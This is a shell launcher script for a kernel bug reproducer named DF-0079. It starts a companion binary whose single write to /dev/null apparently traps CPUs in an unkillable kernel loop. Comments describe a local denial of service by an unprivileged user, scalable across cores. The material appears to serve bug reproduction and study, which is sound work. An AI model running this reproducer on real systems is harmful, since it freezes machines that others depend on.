#!/bin/sh
# DF-0079 run script. Demonstrates the infinite-loop DoS.
#
# Run as an UNPRIVILEGED user (maxx, uid 1001). /dev/null is mode 0666 so no
# privilege is required. The single write() below will NEVER return on a
# vulnerable kernel: it pegs one CPU at 100% inside the kernel (in mmrw)
# forever, and the process cannot be killed (only a reboot recovers). Each
# additional copy wedges another core.
#
# WARNING: this is a full-system local DoS. On a small guest it can make the
# machine unresponsive to ssh within ~1 second. Run in a disposable VM and
# hard-reset afterwards.
#
# Usage:
#   ./run.sh            # wedge 1 CPU forever
#   ./run.sh 4          # fork 4 copies to wedge 4 CPUs
#
# To observe the wedged thread before it starves the box, run (as root, from
# another session, immediately) something like:
#   while true; do pgrep -n df0079 | xargs -r ps -o pid,stat,pcpu,cputime,args -p; sleep 0.2; done
# (or use the serial-console watcher watch_df0079.sh so output survives a reset).
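# Launcher for the DF-0079 reproducer binary that sits next to this script.
#
# Arguments: $1 - number of copies to start (optional, default 1)
# Exit:      2 on a malformed count, 1 if the script directory or the binary
#            is unusable, otherwise the status of ./df0079 (if it returns).

# Work from the script's own directory so ./df0079 resolves to the binary
# shipped alongside it. Stop if the cd fails: carrying on would execute
# whatever ./df0079 happens to exist in the caller's working directory.
cd -- "$(dirname "$0")" || {
    echo "DF-0079: cannot cd to the script directory" >&2
    exit 1
}

N=${1:-1}

# Accept only a plain decimal count. A non-numeric value would make the
# numeric test below error out and fall through to the multi-copy branch with
# an arbitrary string as the argument.
case $N in
    '' | *[!0-9]*)
        echo "usage: $0 [copies]   (copies must be a non-negative integer)" >&2
        exit 2
        ;;
esac

# Report a missing or non-executable binary explicitly, before printing the
# launch banner, so a failed setup is not mistaken for a run.
if [ ! -x ./df0079 ]; then
    echo "DF-0079: ./df0079 is missing or not executable in $(pwd)" >&2
    exit 1
fi

printf 'DF-0079: launching %s wedge process(es) as uid=%s on /dev/null\n' \
    "$N" "$(id -u)"

if [ "$N" -le 1 ]; then
    ./df0079          # never returns on a vulnerable kernel
else
    ./df0079 "$N"     # the binary receives the copy count as its argument
fi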
